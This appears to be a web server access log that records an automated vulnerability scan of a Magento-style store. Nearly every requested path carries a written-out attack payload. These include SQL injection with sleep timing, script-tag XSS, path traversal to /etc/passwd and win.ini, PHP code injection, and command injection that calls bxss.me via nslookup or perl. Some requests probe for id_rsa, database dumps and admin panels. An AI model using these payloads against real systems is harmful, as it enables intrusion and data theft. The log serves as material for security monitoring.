/-1%20OR%202+980-980-1=0+0+0+1/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/product/ 1 -
/cgi-bin/appsettings.Staging.json 1 -
/applet.html 1 -
/owa/ 2 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/default/css/clears.css 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/skin/install/default/default/bxss.me%2ft%2fxss.html%3f%2500/clears.css 1 -
/acc/js/mage/adminhtml/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522.js 1 https://104.36.149.61/
/acc9065875/index.php/install/ 1 https://104.36.149.61/
/server/php/ 1 -
/adminer-4.3.1-mysql-en.php 1 https://104.36.149.61/
/acc'||'/skin/install/default/default/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/tooltip.js 1 https://104.36.149.61/
/1'\"/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/\"+response.write(9682307*9029219)+\"/js/varien/js.js 1 -
/`(nslookup%20hitptchqsnvsf38a53.bxss.me||perl%20-e%20\"gethostbyname('hitptchqsnvsf38a53.bxss.me')\")`/js/mage/ 1 -
/acc/skin/install/default/'\"()&%25<acx><ScRiPt%20>xIbD(9317)<%2fScRiPt>/css/reset.css 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/hash.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/frontend/ 1 https://104.36.149.61/
/@@GJGvp/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/browser.js 1 https://104.36.149.61/
/mufWhbn8')%20OR%20377=(SELECT%20377%20FROM%20PG_SLEEP(15))--/skin/frontend/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/prototype.js 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/css/ie7minus.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/wysiwyg/ 1 -
/acc'||'/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/ 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/browser.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>KYzi(9054)<%2fScRiPt>/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/ 1 https://104.36.149.61/
/cgi-bin/id_rsa 1 -
/thumb/phpThumb.php 1 -
/acc/js/prototype/prototype'\"()&%25<acx><ScRiPt%20>ll2Q(9133)<%2fScRiPt>.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/default/css/clears.css 1 https://104.36.149.61/
/admin/js/tinymce 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/scriptaculous/effects.js 1 https://104.36.149.61/
/health/panel 2 -
/acc/%2fxfs.bxss.me/mage/adminhtml/browser.js 1 -
/'\"/skin/install/default/default/css/ie7minus.css 1 -
/2jk1qWsy')%20OR%20404=(SELECT%20404%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/windows/themes/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/ 1 https://104.36.149.61/
/acc/skin/install/..%2fdefault/default/css/ie7minus.css 1 https://104.36.149.61/
/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php 1 -
/horizon/dashboard 2 -
/WEB-INF/web.xml_ 1 -
/acc/index.php/install/wizard//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/\"+response.write(9928247*9362652)+\"/js/mage/adminhtml/uploader/ 1 -
/acc/..%2fjs/mage/adminhtml/browser.js 1 https://104.36.149.61/
/&echo%20jkuvno$()\\%20yecaet\\nz^xyu||a%20%23'%20&echo%20jkuvno$()\\%20yecaet\\nz^xyu||a%20%23|\"%20&echo%20jkuvno$()\\%20yecaet\\nz^xyu||a%20%23/index.php/install/ 1 -
/acc/index.php/install//../../../../../../../../etc/passwd 2 -
/acc/js/mage/%3b(nslookup%20hitccykplpadg5c1ea.bxss.me||perl%20-e%20\"gethostbyname('hitccykplpadg5c1ea.bxss.me')\")|(nslookup%20hitccykplpadg5c1ea.bxss.me||perl%20-e%20\"gethostbyname('hitccykplpadg5c1ea.bxss.me')\")&(nslookup%20hitccykplpadg5c1ea.bxss.me 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>mwZT(9022)<%2fScRiPt>/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../boot.ini 1 -
/|echo%20qzouls$()\\%20wealnz\\nz^xyu||a%20%23'%20|echo%20qzouls$()\\%20wealnz\\nz^xyu||a%20%23|\"%20|echo%20qzouls$()\\%20wealnz\\nz^xyu||a%20%23/index.php/install/wizard/locale/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/debug.js 1 -
/${@print(md5(31337))}\\/skin/frontend/ 1 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/uploader/ 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/js.js 1 https://104.36.149.61/
/acc9435348/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/css/reset.css 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>JN5X(9802)<%2fScRiPt>/prototype/windows/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>kUNn(9403)<%2fScRiPt>/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/hash.js 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"QC91\"=\"QC91/skin/install/default/ 1 https://104.36.149.61/
/'+response.write(9695601*9411553)+'/js/mage/adminhtml/image.js 1 -
/wp-includes/js/tiny_mce 1 -
/@@L24aB/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/index.php/install/'\"()&%25<acx><ScRiPt%20>KhMd(9158)<%2fScRiPt>/config/ 1 https://104.36.149.61/
/dbadmin/ 1 -
/${@print(md5(31337))}/js/mage/adminhtml/image.js 1 -
/acc/js/mage/adminhtml/%3b(nslookup%20hittsuicxnkmj336c2.bxss.me||perl%20-e%20\"gethostbyname('hittsuicxnkmj336c2.bxss.me')\")|(nslookup%20hittsuicxnkmj336c2.bxss.me||perl%20-e%20\"gethostbyname('hittsuicxnkmj336c2.bxss.me')\")&(nslookup%20hittsuicxnkmj336 1 -
/cgi-bin/php5 1 -
/admin/pma/ 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/tooltip_manager.js 1 https://104.36.149.61/
/)/js/prototype/tooltip.js 1 https://104.36.149.61/
/dbadmin/main.php 1 -
/echo%20ctlnqg$()\\%20rglhml\\nz^xyu||a%20%23'%20&echo%20ctlnqg$()\\%20rglhml\\nz^xyu||a%20%23|\"%20&echo%20ctlnqg$()\\%20rglhml\\nz^xyu||a%20%23/js/mage/adminhtml/sales/ 1 -
/acc'||'/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/validation.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/evO6mwLx'%20OR%20442=(SELECT%20442%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/acc/skin/install/%2fxfs.bxss.me/default/css/ie7minus.css 1 -
/acc/.%2fjs/mage/ 1 https://104.36.149.61/
/..%2facc/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/grid.js 1 -
/'+'A'.concat(70-3).concat(22*4).concat(98).concat(89).concat(114).concat(77)+(require'socket'%0aSocket.gethostbyname('hitiw'+'jinfvumx6f029.bxss.me.')[3].to_s)+'/js/varien/js.js 1 -
/acc/index.php/install/wizard/locale//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/owa 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/events.js 1 -
/&(nslookup%20hitjsexitlglt4b3f6.bxss.me||perl%20-e%20\"gethostbyname('hitjsexitlglt4b3f6.bxss.me')\")&'\\\"`0&(nslookup%20hitjsexitlglt4b3f6.bxss.me||perl%20-e%20\"gethostbyname('hitjsexitlglt4b3f6.bxss.me')\")&`'/js/mage/adminhtml/sales/ 1 -
/${@print(md5(31337))}/index.php/install/ 1 -
/acc/js/mage/adminhtml/accordion.js/942575%40 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/adminhtml/ 1 -
/index.php/api/xmlrpc 4 -
/acc'||'/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/adminhtml/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/prototype/debug.js 1 -
/acc/skin/%3b(nslookup%20hitdyyoeologo213a4.bxss.me||perl%20-e%20\"gethostbyname('hitdyyoeologo213a4.bxss.me')\")|(nslookup%20hitdyyoeologo213a4.bxss.me||perl%20-e%20\"gethostbyname('hitdyyoeologo213a4.bxss.me')\")&(nslookup%20hitdyyoeologo213a4.bxss.me||p 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/sales/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/translate.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/ 1 -
/vLpUWMEp/skin/install/default/ 1 https://104.36.149.61/
/appsettings.Staging.json 1 -
/@@OwuFB/js/scriptaculous/effects.js 1 https://104.36.149.61/
/solr/select/ 1 -
/acc/index.php/install/wizard/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/default/default/ 1 -
/acc/index.php//./WEB-INF/web.xml%00.jsp 1 -
/acc/skin/install/default/default/'\"()&%25<acx><ScRiPt%20>xIbD(9848)<%2fScRiPt>/reset.css 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'TPo8'='TPo8/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/install/default/default/css'\"()&%25<acx><ScRiPt%20>Ijhk(9181)<%2fScRiPt>/boxes.css 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(86).concat(116).concat(75)+(require\"socket\"%0aSocket.gethostbyname(\"hitek\"+\"qfvuaxef1eef8.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/grid.js 1 -
/acc/js/..%2fmage/adminhtml/image.js 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/)/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/-1%20OR%202+912-912-1=0+0+0+1/index.php/install/wizard/config/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/skin/install/default/default/css/boxes.css 1 -
/acc/skin/..%2fadminhtml/default/ 1 https://104.36.149.61/
/acc'||'/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/!(()&&!|*|*|/skin/adminhtml/default/ 1 https://104.36.149.61/
/IXLZNkyI'%20OR%20161=(SELECT%20161%20FROM%20PG_SLEEP(15))--/index.php/install/wizard/config/ 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/<!--/js/prototype/tooltip_manager.js 1 -
/acc/.%2fjs/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/..%2fmage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/sales/ 1 -
/adminer-4.3.0-mysql-en.php 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/prototype/prototype.js 1 -
/adminer-4.5.0-en.php 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/giftoptions/ 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/windows/ 1 -
/'\"/js/mage/adminhtml/product/ 1 -
/dVT3LJK3'%20OR%20687=(SELECT%20687%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/|(nslookup%20hitoknrjhxxrc0a80c.bxss.me||perl%20-e%20\"gethostbyname('hitoknrjhxxrc0a80c.bxss.me')\")/js/varien/form.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/woPwG8Df61.jsp 1 -
/LetsEncrypt/Index 2 -
/app/../../../../../../../../../../../../../etc/shells 1 -
/acc/skin/install/12345'\"\\'\\\") 7 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/login 6 -
/'\"/skin/install/default/default/css/clears.css 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/scriptaculous/%2fxfs.bxss.me.js 1 -
/acc/index.php/install/wizard/config/..%2f..%2f..%2fpackage-lock.json 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/default/css/boxes.css 1 -
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/default/default/css/reset.css 1 https://104.36.149.61/
/-1%20OR%202+163-163-1=0+0+0+1/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/(nslookup%20hitlssnapxhuscd771.bxss.me||perl%20-e%20\"gethostbyname('hitlssnapxhuscd771.bxss.me')\")/js/mage/adminhtml/giftmessage.js 1 -
/acc/js/..%2fprototype/tooltip_manager.js 1 https://104.36.149.61/
/cgi-bin/yarn.lock 1 -
/acc/js/mage/adminhtml/image.js/966587%40 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/grid.js 1 https://104.36.149.61/
/cgi-bin/.svn/entries 1 -
/acc/js/mage/.%2fadminhtml/sales/ 1 https://104.36.149.61/
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>ja2b(9519)<%2fScRiPt>/tooltip_manager.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/varien/js.js 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>fBHE(9528)<%2fScRiPt>/extended_debug.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/%2fxfs.bxss.me.js 1 -
/..%2facc/js/prototype/debug.js 1 https://104.36.149.61/
//../../../../../../../../etc/passwd%00.jsp 1 -
//../../../../../../../../windows/win.ini%00en 1 -
/acc/skin/.%2finstall/default/default/css/clears.css 1 https://104.36.149.61/
/module/tinymce 1 -
/@@23jFD/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/ 1 -
/bxss.me/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/index.php/install//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/dbdump.sql.gz 1 -
/p1KaLmIg2kB7fZp5 1 -
/acc/js/scriptaculous/12345'\"\\'\\\") 1 https://104.36.149.61/
/acc/index.php/install/..%2fwizard/locale/ 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2fGemfile 1 -
/acc/js/%3b(nslookup%20hitddrbtxhupc1c7cd.bxss.me||perl%20-e%20\"gethostbyname('hitddrbtxhupc1c7cd.bxss.me')\")|(nslookup%20hitddrbtxhupc1c7cd.bxss.me||perl%20-e%20\"gethostbyname('hitddrbtxhupc1c7cd.bxss.me')\")&(nslookup%20hitddrbtxhupc1c7cd.bxss.me||per 1 -
/javax.faces.resource.../WEB-INF/web.xml.jsf 77 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/backup.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>KYzi(9372)<%2fScRiPt>/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>WvSu(9038)<%2fScRiPt>/mage/adminhtml/events.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/prototype/ 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>q8Xa(9378)<%2fScRiPt>/browser.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>KwaQ(9811)<%2fScRiPt>/js/prototype/debug.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/1'\"/js/varien/form.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc'||'/index.php/install/wizard/config/ 1 https://104.36.149.61/
/..%2facc/js/varien/js.js 1 https://104.36.149.61/
/acc/js/prototype/12345'\"\\'\\\") 3 https://104.36.149.61/
/response.write(9229203*9108783)/js/mage/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/prototype.js 1 -
/^(%23$!@%23$)(()))******/js/prototype/prototype.js 1 https://104.36.149.61/
/104db.rar 1 -
/'+'A'.concat(70-3).concat(22*4).concat(100).concat(80).concat(118).concat(84)+(require'socket'%0aSocket.gethostbyname('hitdg'+'qfpoexpu1f182.bxss.me.')[3].to_s)+'/skin/install/default/default/css/boxes.css 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'6m3g'='6m3g/js/prototype/windows/themes/ 1 https://104.36.149.61/
/minify/min/index.php 1 -
/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/acc/..%2fjs/mage/adminhtml/image.js 1 https://104.36.149.61/
/bxss.me/js/prototype/prototype.js 1 https://104.36.149.61/
//js/mage/translate.js 1 https://104.36.149.61/
/${9999739+9999797}/js/mage/adminhtml/flexuploader.js 1 -
/\"+response.write(9873402*9230071)+\"/js/prototype/tooltip_manager.js 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/extended_debug.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/prototype/tooltip_manager.js 1 -
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/acc/skin/install/default/1%00%c0%a7%c0%a2%252527%252522/css/reset.css 1 https://104.36.149.61/
/104-database.sql.tar 1 -
/acc/js/mage/adminhtml/tools.js/911139%40 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/default/css/reset.css 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/wizard/config/ 1 https://104.36.149.61/
/`(nslookup%20hitersyneipwsa4353.bxss.me||perl%20-e%20\"gethostbyname('hitersyneipwsa4353.bxss.me')\")`/js/prototype/prototype.js 1 -
/acc//mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/install/default/default/css/boxes.css 1 -
/|echo%20opkpjt$()\\%20hycnxw\\nz^xyu||a%20%23'%20|echo%20opkpjt$()\\%20hycnxw\\nz^xyu||a%20%23|\"%20|echo%20opkpjt$()\\%20hycnxw\\nz^xyu||a%20%23/js/mage/adminhtml/product/ 1 -
/\"+response.write(9695601*9411553)+\"/js/mage/adminhtml/image.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/./WEB-INF/web.xml%00.jsp 2 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"a1Ug\"=\"a1Ug/js/prototype/debug.js 1 https://104.36.149.61/
/acc'||'/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/acc/js/mage/adminhtml/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/prototype/validation.js 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc/skin/install/%3b(nslookup%20hitulzctghzri06032.bxss.me||perl%20-e%20\"gethostbyname('hitulzctghzri06032.bxss.me')\")|(nslookup%20hitulzctghzri06032.bxss.me||perl%20-e%20\"gethostbyname('hitulzctghzri06032.bxss.me')\")&(nslookup%20hitulzctghzri06032.bx 1 -
/acc'||'/index.php/install/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/prototype/tooltip_manager.js 1 -
/acc/index.php/install/wizard/config/..%2fGemfile 1 -
/rQNRNC9l'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/acc/js/mage/..%2fadminhtml/events.js 1 https://104.36.149.61/
/libs/js/extjs//examples/feed-viewer/feed-proxy.php 1 -
/acc/index.php/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/wizard/config/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'B2fw'!='B2fw%25/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/skin/install/default/default/'\"()&%25<acx><ScRiPt%20>dgnk(9827)<%2fScRiPt>/iestyles.css 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/ 1 -
/acc/skin/install/default/default/%3b(nslookup%20hitwunjaignpmd79ea.bxss.me||perl%20-e%20\"gethostbyname('hitwunjaignpmd79ea.bxss.me')\")|(nslookup%20hitwunjaignpmd79ea.bxss.me||perl%20-e%20\"gethostbyname('hitwunjaignpmd79ea.bxss.me')\")&(nslookup%20hitwu 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/varien/js.js 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/..%2findex.php/install/ 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/api/4/nginx 1 https://104.36.149.61/
/104.36.149.61-backup.tgz 1 -
/.%2facc/skin/install/default/default/ 1 https://104.36.149.61/
/xmlrpc-server.php 4 -
/acc/js/.%2fprototype/prototype.js 1 https://104.36.149.61/
/%3b(nslookup%20hitbhmzbghnbj0eb37.bxss.me||perl%20-e%20\"gethostbyname('hitbhmzbghnbj0eb37.bxss.me')\")|(nslookup%20hitbhmzbghnbj0eb37.bxss.me||perl%20-e%20\"gethostbyname('hitbhmzbghnbj0eb37.bxss.me')\")&(nslookup%20hitbhmzbghnbj0eb37.bxss.me||perl%20-e% 1 -
/1%00%c0%a7%c0%a2%252527%252522/skin/adminhtml/default/ 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/)/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/-1%20OR%203+980-980-1=0+0+0+1/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/backup.js 1 -
/|(nslookup%20hitdlwfwsdoka19473.bxss.me||perl%20-e%20\"gethostbyname('hitdlwfwsdoka19473.bxss.me')\")/skin/install/default/default/css/reset.css 1 -
/%2fxfs.bxss.me/js/prototype/validation.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/hash.js 1 https://104.36.149.61/
/acc/index.php/../../../../../package-lock.json 1 -
/104-database.tar 1 -
/acc/index.php/install/wizard//../../../../../../../../etc/passwd%00 1 -
